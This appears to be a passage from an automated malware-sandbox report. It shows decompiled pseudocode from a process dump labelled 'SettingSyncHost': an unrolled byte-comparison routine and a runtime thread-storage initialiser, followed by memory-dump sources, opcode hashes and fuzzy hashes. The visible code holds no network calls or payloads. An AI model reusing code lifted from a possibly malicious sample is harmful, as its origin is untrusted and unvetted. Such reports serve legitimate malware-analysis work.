                                                                                                                                      											_t263 = ( *(_t177 - 9) & 0x000000ff) - ( *(_t181 - 9) & 0x000000ff);
                                                                                                                                      											if(_t263 != 0) {
                                                                                                                                      												_t126 = (0 | _t263 > 0x00000000) - 1; // -1
                                                                                                                                      												_t263 = (_t263 > 0) + _t126;
                                                                                                                                      											}
                                                                                                                                      											goto L55;
                                                                                                                                      										}
                                                                                                                                      										_t120 = (0 | _t283 > 0x00000000) - 1; // -1
                                                                                                                                      										_t263 = (_t283 > 0) + _t120;
                                                                                                                                      										if(_t263 != 0) {
                                                                                                                                      											goto L1;
                                                                                                                                      										}
                                                                                                                                      										goto L52;
                                                                                                                                      									}
                                                                                                                                      									_t114 = (0 | _t281 > 0x00000000) - 1; // -1
                                                                                                                                      									_t263 = (_t281 > 0) + _t114;
                                                                                                                                      									if(_t263 != 0) {
                                                                                                                                      										goto L1;
                                                                                                                                      									}
                                                                                                                                      									goto L50;
                                                                                                                                      								}
                                                                                                                                      								_t108 = (0 | _t279 > 0x00000000) - 1; // -1
                                                                                                                                      								_t263 = (_t279 > 0) + _t108;
                                                                                                                                      								if(_t263 != 0) {
                                                                                                                                      									goto L1;
                                                                                                                                      								}
                                                                                                                                      								goto L48;
                                                                                                                                      							}
                                                                                                                                      							_t286 = (_t188 & 0x000000ff) - ( *(_t181 - 0x10) & 0x000000ff);
                                                                                                                                      							if(_t286 == 0) {
                                                                                                                                      								L37:
                                                                                                                                      								_t288 = ( *(_t177 - 0xf) & 0x000000ff) - ( *(_t181 - 0xf) & 0x000000ff);
                                                                                                                                      								if(_t288 == 0) {
                                                                                                                                      									L39:
                                                                                                                                      									_t290 = ( *(_t177 - 0xe) & 0x000000ff) - ( *(_t181 - 0xe) & 0x000000ff);
                                                                                                                                      									if(_t290 == 0) {
                                                                                                                                      										L41:
                                                                                                                                      										_t263 = ( *(_t177 - 0xd) & 0x000000ff) - ( *(_t181 - 0xd) & 0x000000ff);
                                                                                                                                      										if(_t263 != 0) {
                                                                                                                                      											_t100 = (0 | _t263 > 0x00000000) - 1; // -1
                                                                                                                                      											_t263 = (_t263 > 0) + _t100;
                                                                                                                                      										}
                                                                                                                                      										goto L44;
                                                                                                                                      									}
                                                                                                                                      									_t94 = (0 | _t290 > 0x00000000) - 1; // -1
                                                                                                                                      									_t263 = (_t290 > 0) + _t94;
                                                                                                                                      									if(_t263 != 0) {
                                                                                                                                      										goto L1;
                                                                                                                                      									}
                                                                                                                                      									goto L41;
                                                                                                                                      								}
                                                                                                                                      								_t88 = (0 | _t288 > 0x00000000) - 1; // -1
                                                                                                                                      								_t263 = (_t288 > 0) + _t88;
                                                                                                                                      								if(_t263 != 0) {
                                                                                                                                      									goto L1;
                                                                                                                                      								}
                                                                                                                                      								goto L39;
                                                                                                                                      							}
                                                                                                                                      							_t82 = (0 | _t286 > 0x00000000) - 1; // -1
                                                                                                                                      							_t263 = (_t286 > 0) + _t82;
                                                                                                                                      							if(_t263 != 0) {
                                                                                                                                      								goto L1;
                                                                                                                                      							}
                                                                                                                                      							goto L37;
                                                                                                                                      						}
                                                                                                                                      						_t293 = (_t187 & 0x000000ff) - ( *(_t181 - 0x14) & 0x000000ff);
                                                                                                                                      						if(_t293 == 0) {
                                                                                                                                      							L26:
                                                                                                                                      							_t295 = ( *(_t177 - 0x13) & 0x000000ff) - ( *(_t181 - 0x13) & 0x000000ff);
                                                                                                                                      							if(_t295 == 0) {
                                                                                                                                      								L28:
                                                                                                                                      								_t297 = ( *(_t177 - 0x12) & 0x000000ff) - ( *(_t181 - 0x12) & 0x000000ff);
                                                                                                                                      								if(_t297 == 0) {
                                                                                                                                      									L30:
                                                                                                                                      									_t263 = ( *(_t177 - 0x11) & 0x000000ff) - ( *(_t181 - 0x11) & 0x000000ff);
                                                                                                                                      									if(_t263 != 0) {
                                                                                                                                      										_t75 = (0 | _t263 > 0x00000000) - 1; // -1
                                                                                                                                      										_t263 = (_t263 > 0) + _t75;
                                                                                                                                      									}
                                                                                                                                      									goto L33;
                                                                                                                                      								}
                                                                                                                                      								_t69 = (0 | _t297 > 0x00000000) - 1; // -1
                                                                                                                                      								_t263 = (_t297 > 0) + _t69;
                                                                                                                                      								if(_t263 != 0) {
                                                                                                                                      									goto L1;
                                                                                                                                      								}
                                                                                                                                      								goto L30;
                                                                                                                                      							}
                                                                                                                                      							_t63 = (0 | _t295 > 0x00000000) - 1; // -1
                                                                                                                                      							_t263 = (_t295 > 0) + _t63;
                                                                                                                                      							if(_t263 != 0) {
                                                                                                                                      								goto L1;
                                                                                                                                      							}
                                                                                                                                      							goto L28;
                                                                                                                                      						}
                                                                                                                                      						_t57 = (0 | _t293 > 0x00000000) - 1; // -1
                                                                                                                                      						_t263 = (_t293 > 0) + _t57;
                                                                                                                                      						if(_t263 != 0) {
                                                                                                                                      							goto L1;
                                                                                                                                      						}
                                                                                                                                      						goto L26;
                                                                                                                                      					}
                                                                                                                                      					_t300 = (_t186 & 0x000000ff) - ( *(_t181 - 0x18) & 0x000000ff);
                                                                                                                                      					if(_t300 == 0) {
                                                                                                                                      						L15:
                                                                                                                                      						_t302 = ( *(_t177 - 0x17) & 0x000000ff) - ( *(_t181 - 0x17) & 0x000000ff);
                                                                                                                                      						if(_t302 == 0) {
                                                                                                                                      							L17:
                                                                                                                                      							_t304 = ( *(_t177 - 0x16) & 0x000000ff) - ( *(_t181 - 0x16) & 0x000000ff);
                                                                                                                                      							if(_t304 == 0) {
                                                                                                                                      								L19:
                                                                                                                                      								_t263 = ( *(_t177 - 0x15) & 0x000000ff) - ( *(_t181 - 0x15) & 0x000000ff);
                                                                                                                                      								if(_t263 != 0) {
                                                                                                                                      									_t50 = (0 | _t263 > 0x00000000) - 1; // -1
                                                                                                                                      									_t263 = (_t263 > 0) + _t50;
                                                                                                                                      								}
                                                                                                                                      								goto L22;
                                                                                                                                      							}
                                                                                                                                      							_t44 = (0 | _t304 > 0x00000000) - 1; // -1
                                                                                                                                      							_t263 = (_t304 > 0) + _t44;
                                                                                                                                      							if(_t263 != 0) {
                                                                                                                                      								goto L1;
                                                                                                                                      							}
                                                                                                                                      							goto L19;
                                                                                                                                      						}
                                                                                                                                      						_t38 = (0 | _t302 > 0x00000000) - 1; // -1
                                                                                                                                      						_t263 = (_t302 > 0) + _t38;
                                                                                                                                      						if(_t263 != 0) {
                                                                                                                                      							goto L1;
                                                                                                                                      						}
                                                                                                                                      						goto L17;
                                                                                                                                      					}
                                                                                                                                      					_t32 = (0 | _t300 > 0x00000000) - 1; // -1
                                                                                                                                      					_t263 = (_t300 > 0) + _t32;
                                                                                                                                      					if(_t263 != 0) {
                                                                                                                                      						goto L1;
                                                                                                                                      					}
                                                                                                                                      					goto L15;
                                                                                                                                      				} else {
                                                                                                                                      					__esi = __dl & 0x000000ff;
                                                                                                                                      					__edx =  *(__ecx - 0x1c) & 0x000000ff;
                                                                                                                                      					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
                                                                                                                                      					if(__esi == 0) {
                                                                                                                                      						L4:
                                                                                                                                      						__esi =  *(__eax - 0x1b) & 0x000000ff;
                                                                                                                                      						__edx =  *(__ecx - 0x1b) & 0x000000ff;
                                                                                                                                      						__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
                                                                                                                                      						if(__esi == 0) {
                                                                                                                                      							L6:
                                                                                                                                      							__esi =  *(__eax - 0x1a) & 0x000000ff;
                                                                                                                                      							__edx =  *(__ecx - 0x1a) & 0x000000ff;
                                                                                                                                      							__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
                                                                                                                                      							if(__esi == 0) {
                                                                                                                                      								L8:
                                                                                                                                      								__esi =  *(__eax - 0x19) & 0x000000ff;
                                                                                                                                      								__edx =  *(__ecx - 0x19) & 0x000000ff;
                                                                                                                                      								__esi = ( *(__eax - 0x19) & 0x000000ff) - ( *(__ecx - 0x19) & 0x000000ff);
                                                                                                                                      								if(__esi != 0) {
                                                                                                                                      									__edx = 0;
                                                                                                                                      									_t25 = (0 | __esi > 0x00000000) - 1; // -1
                                                                                                                                      									__esi = (__esi > 0) + _t25;
                                                                                                                                      								}
                                                                                                                                      								goto L11;
                                                                                                                                      							}
                                                                                                                                      							__edx = 0;
                                                                                                                                      							__edx = 0 | __esi > 0x00000000;
                                                                                                                                      							_t19 = __edx - 1; // -1
                                                                                                                                      							__esi = __edx + _t19;
                                                                                                                                      							if(__edx + _t19 != 0) {
                                                                                                                                      								goto L1;
                                                                                                                                      							}
                                                                                                                                      							goto L8;
                                                                                                                                      						}
                                                                                                                                      						__edx = 0;
                                                                                                                                      						__edx = 0 | __esi > 0x00000000;
                                                                                                                                      						_t13 = __edx - 1; // -1
                                                                                                                                      						__esi = __edx + _t13;
                                                                                                                                      						if(__edx + _t13 != 0) {
                                                                                                                                      							goto L1;
                                                                                                                                      						}
                                                                                                                                      						goto L6;
                                                                                                                                      					}
                                                                                                                                      					__edx = 0;
                                                                                                                                      					__edx = 0 | __esi > 0x00000000;
                                                                                                                                      					_t7 = __edx - 1; // -1
                                                                                                                                      					__esi = __edx + _t7;
                                                                                                                                      					if(__edx + _t7 != 0) {
                                                                                                                                      						goto L1;
                                                                                                                                      					}
                                                                                                                                      					goto L4;
                                                                                                                                      				}
                                                                                                                                      				L1:
                                                                                                                                      				_t178 = _t263;
                                                                                                                                      				goto L80;
                                                                                                                                      			}































                                                                                                                                      0x0039cf31
                                                                                                                                      0x0039cf31
                                                                                                                                      0x0039cf31
                                                                                                                                      0x00000000
                                                                                                                                      0x0039cf28
                                                                                                                                      0x0039cf12
                                                                                                                                      0x0039cf12
                                                                                                                                      0x0039cf18
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039cf18
                                                                                                                                      0x0039cef3
                                                                                                                                      0x0039cef3
                                                                                                                                      0x0039cef9
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039cef9
                                                                                                                                      0x0039ced4
                                                                                                                                      0x0039ced4
                                                                                                                                      0x0039ceda
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039ceda
                                                                                                                                      0x0039ce42
                                                                                                                                      0x0039ce44
                                                                                                                                      0x0039ce59
                                                                                                                                      0x0039ce61
                                                                                                                                      0x0039ce63
                                                                                                                                      0x0039ce78
                                                                                                                                      0x0039ce80
                                                                                                                                      0x0039ce82
                                                                                                                                      0x0039ce97
                                                                                                                                      0x0039ce9f
                                                                                                                                      0x0039cea1
                                                                                                                                      0x0039ceaa
                                                                                                                                      0x0039ceaa
                                                                                                                                      0x0039ceaa
                                                                                                                                      0x00000000
                                                                                                                                      0x0039cea1
                                                                                                                                      0x0039ce8b
                                                                                                                                      0x0039ce8b
                                                                                                                                      0x0039ce91
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039ce91
                                                                                                                                      0x0039ce6c
                                                                                                                                      0x0039ce6c
                                                                                                                                      0x0039ce72
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039ce72
                                                                                                                                      0x0039ce4d
                                                                                                                                      0x0039ce4d
                                                                                                                                      0x0039ce53
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039ce53
                                                                                                                                      0x0039cdbb
                                                                                                                                      0x0039cdbd
                                                                                                                                      0x0039cdd2
                                                                                                                                      0x0039cdda
                                                                                                                                      0x0039cddc
                                                                                                                                      0x0039cdf1
                                                                                                                                      0x0039cdf9
                                                                                                                                      0x0039cdfb
                                                                                                                                      0x0039ce10
                                                                                                                                      0x0039ce18
                                                                                                                                      0x0039ce1a
                                                                                                                                      0x0039ce23
                                                                                                                                      0x0039ce23
                                                                                                                                      0x0039ce23
                                                                                                                                      0x00000000
                                                                                                                                      0x0039ce1a
                                                                                                                                      0x0039ce04
                                                                                                                                      0x0039ce04
                                                                                                                                      0x0039ce0a
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039ce0a
                                                                                                                                      0x0039cde5
                                                                                                                                      0x0039cde5
                                                                                                                                      0x0039cdeb
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039cdeb
                                                                                                                                      0x0039cdc6
                                                                                                                                      0x0039cdc6
                                                                                                                                      0x0039cdcc
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039cd3d
                                                                                                                                      0x0039cd3d
                                                                                                                                      0x0039cd40
                                                                                                                                      0x0039cd44
                                                                                                                                      0x0039cd46
                                                                                                                                      0x0039cd57
                                                                                                                                      0x0039cd57
                                                                                                                                      0x0039cd5b
                                                                                                                                      0x0039cd5f
                                                                                                                                      0x0039cd61
                                                                                                                                      0x0039cd72
                                                                                                                                      0x0039cd72
                                                                                                                                      0x0039cd76
                                                                                                                                      0x0039cd7a
                                                                                                                                      0x0039cd7c
                                                                                                                                      0x0039cd8d
                                                                                                                                      0x0039cd8d
                                                                                                                                      0x0039cd91
                                                                                                                                      0x0039cd95
                                                                                                                                      0x0039cd97
                                                                                                                                      0x0039cd99
                                                                                                                                      0x0039cda0
                                                                                                                                      0x0039cda0
                                                                                                                                      0x0039cda0
                                                                                                                                      0x00000000
                                                                                                                                      0x0039cd97
                                                                                                                                      0x0039cd7e
                                                                                                                                      0x0039cd82
                                                                                                                                      0x0039cd85
                                                                                                                                      0x0039cd85
                                                                                                                                      0x0039cd8b
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039cd8b
                                                                                                                                      0x0039cd63
                                                                                                                                      0x0039cd67
                                                                                                                                      0x0039cd6a
                                                                                                                                      0x0039cd6a
                                                                                                                                      0x0039cd70
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039cd70
                                                                                                                                      0x0039cd48
                                                                                                                                      0x0039cd4c
                                                                                                                                      0x0039cd4f
                                                                                                                                      0x0039cd4f
                                                                                                                                      0x0039cd55
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039cd55
                                                                                                                                      0x0039cd2e
                                                                                                                                      0x0039cd2e
                                                                                                                                      0x00000000

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
                                                                                                                                      • Instruction ID: 9955b1e3ff7904f4bf5722f05b36fbaf875af92188bca92a57196e5df5b5f8f1
                                                                                                                                      • Opcode Fuzzy Hash: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
                                                                                                                                      • Instruction Fuzzy Hash: 6FB19173D2A4B3098F37852D041823FEEA26E91B8131FD3A5DCD03F689C626AD1596D0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 3a365631c64c82b908384487e1b3a30ea151bd1c5a546b6b93e325d8e6201643
                                                                                                                                      • Instruction ID: 27fe4a9c3f363f7cae70eb913c223ea78ab345c911577d0701f70e19919ef07e
                                                                                                                                      • Opcode Fuzzy Hash: 3a365631c64c82b908384487e1b3a30ea151bd1c5a546b6b93e325d8e6201643
                                                                                                                                      • Instruction Fuzzy Hash: AA619DB2D052599FCB06CFA8E9847EEFBB5AF59310F15422EE901B7341DB71A940CB90
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 27398a6bd04e7b042c2df0dd4eefd57469496f7df0cf8f294bdbd0d9e34c2454
                                                                                                                                      • Instruction ID: 09da3143265f5ab02d42d4a80ee5e264c156248898c0148b4ff7e436ff76413a
                                                                                                                                      • Opcode Fuzzy Hash: 27398a6bd04e7b042c2df0dd4eefd57469496f7df0cf8f294bdbd0d9e34c2454
                                                                                                                                      • Instruction Fuzzy Hash: 8F4192327215168FD708CF39C891BA5F7E1FB98310F198769E42ACB2C1DB35E9148B84
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: df374039a1ec8235830c55ee3a6ca55fc8ac3a772c9303e1718171eefd7ff16a
                                                                                                                                      • Instruction ID: 2162deb9d1d0a4831586bf0b55db8244af19c359e7a0eef09fd30878c3c51fef
                                                                                                                                      • Opcode Fuzzy Hash: df374039a1ec8235830c55ee3a6ca55fc8ac3a772c9303e1718171eefd7ff16a
                                                                                                                                      • Instruction Fuzzy Hash: 8721B373F205394B7B0CC47E8C522BDB6E1C68C601745823AE8A6EA2C1D968D917E2E4
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: d9a95e161870922b8713be60acd03636d69b112b4dc6e47a5653678df07ba855
                                                                                                                                      • Instruction ID: b0007f28095afc14f1f89efd9a22b755a54dfb922478509c7d346ea71f7313e8
                                                                                                                                      • Opcode Fuzzy Hash: d9a95e161870922b8713be60acd03636d69b112b4dc6e47a5653678df07ba855
                                                                                                                                      • Instruction Fuzzy Hash: E611CA23F30C295B775C81BD8C1327A91D6EBD824030F433AD826E7284E9A4DE13D290
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                      • Instruction ID: 9be3ccf046224bcce0c703e2978a61a7c4ffd434c5402d293278324f78670fc0
                                                                                                                                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                      • Instruction Fuzzy Hash: 1A110877244091C3D6078E2EF4B46FBE797EBD932172F426BD0424BB58D322D9459600
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: f509f8d2448dd614a59530674a118a5ec7eafcc17b1c1d6058280c35db75ccc1
                                                                                                                                      • Instruction ID: 4734b4ff4c12415d8743d7a2518971c212a19b73efa857026713674ebeebb1db
                                                                                                                                      • Opcode Fuzzy Hash: f509f8d2448dd614a59530674a118a5ec7eafcc17b1c1d6058280c35db75ccc1
                                                                                                                                      • Instruction Fuzzy Hash: E5E08632911278EBC715DBCEC504959F3ECE744B00B151556F501E3280C2B4DE40CBD0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 62%
                                                                                                                                      			E00399A94(void* __ebx) {
                                                                                                                                      				void* __edi;
                                                                                                                                      				void* __esi;
                                                                                                                                      				_Unknown_base(*)()* _t7;
                                                                                                                                      				long _t10;
                                                                                                                                      				void* _t11;
                                                                                                                                      				int _t12;
                                                                                                                                      				void* _t14;
                                                                                                                                      				void* _t15;
                                                                                                                                      				void* _t16;
                                                                                                                                      				void* _t18;
                                                                                                                                      				intOrPtr _t21;
                                                                                                                                      				long _t26;
                                                                                                                                      				void* _t30;
                                                                                                                                      				struct HINSTANCE__* _t35;
                                                                                                                                      				intOrPtr* _t36;
                                                                                                                                      				void* _t39;
                                                                                                                                      				intOrPtr* _t41;
                                                                                                                                      				void* _t42;
                                                                                                                                      
                                                                                                                                      				_t30 = __ebx;
                                                                                                                                      				_t35 = GetModuleHandleW(L"KERNEL32.DLL");
                                                                                                                                      				if(_t35 != 0) {
                                                                                                                                      					 *0x4edbc0 = GetProcAddress(_t35, "FlsAlloc");
                                                                                                                                      					 *0x4edbc4 = GetProcAddress(_t35, "FlsGetValue");
                                                                                                                                      					 *0x4edbc8 = GetProcAddress(_t35, "FlsSetValue");
                                                                                                                                      					_t7 = GetProcAddress(_t35, "FlsFree");
                                                                                                                                      					__eflags =  *0x4edbc0;
                                                                                                                                      					_t39 = TlsSetValue;
                                                                                                                                      					 *0x4edbcc = _t7;
                                                                                                                                      					if( *0x4edbc0 == 0) {
                                                                                                                                      						L6:
                                                                                                                                      						 *0x4edbc4 = TlsGetValue;
                                                                                                                                      						 *0x4edbc0 = E003996ED;
                                                                                                                                      						 *0x4edbc8 = _t39;
                                                                                                                                      						 *0x4edbcc = TlsFree;
                                                                                                                                      					} else {
                                                                                                                                      						__eflags =  *0x4edbc4;
                                                                                                                                      						if( *0x4edbc4 == 0) {
                                                                                                                                      							goto L6;
                                                                                                                                      						} else {
                                                                                                                                      							__eflags =  *0x4edbc8;
                                                                                                                                      							if( *0x4edbc8 == 0) {
                                                                                                                                      								goto L6;
                                                                                                                                      							} else {
                                                                                                                                      								__eflags = _t7;
                                                                                                                                      								if(_t7 == 0) {
                                                                                                                                      									goto L6;
                                                                                                                                      								}
                                                                                                                                      							}
                                                                                                                                      						}
                                                                                                                                      					}
                                                                                                                                      					_t10 = TlsAlloc();
                                                                                                                                      					 *0x3c746c = _t10;
